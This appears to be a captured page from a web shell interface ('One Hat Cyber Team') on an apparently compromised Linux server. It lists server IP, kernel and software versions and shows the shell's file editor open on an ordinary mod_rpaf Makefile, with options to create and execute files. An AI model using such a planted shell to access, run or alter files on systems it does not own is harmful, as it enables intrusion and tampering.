One Hat Cyber Team
Your IP :
172.70.80.190
Server IP :
188.114.96.3
Server :
Linux thuru 6.5.11-4-pve #1 SMP PREEMPT_DYNAMIC PMX 6.5.11-4 (2023-11-20T10:19Z) x86_64
Server Software :
Apache/2.4.51 (Unix) OpenSSL/1.0.2k-fips
PHP Version :
7.3.33
Buat File
|
Buat Folder
Eksekusi
Dir :
~
/
usr
/
local
/
src
/
mod_rpaf-0.8.4
/
Edit File:
Makefile
# Makefile for mod_rpaf.c (gmake) # $Id: Makefile 16 2007-12-13 03:40:22Z thomas $ APXS=./apxs.sh rpaf: mod_rpaf.so @echo make done @echo type \"make install\" to install mod_rpaf mod_rpaf.so: mod_rpaf.c $(APXS) -c -n $@ mod_rpaf.c mod_rpaf.c: install: mod_rpaf.so $(APXS) -i -S LIBEXECDIR=$(DESTDIR)$$($(APXS) -q LIBEXECDIR)/ -n mod_rpaf.so mod_rpaf.la clean: rm -rf *~ *.o *.so *.lo *.la *.slo *.loT .libs/
Simpan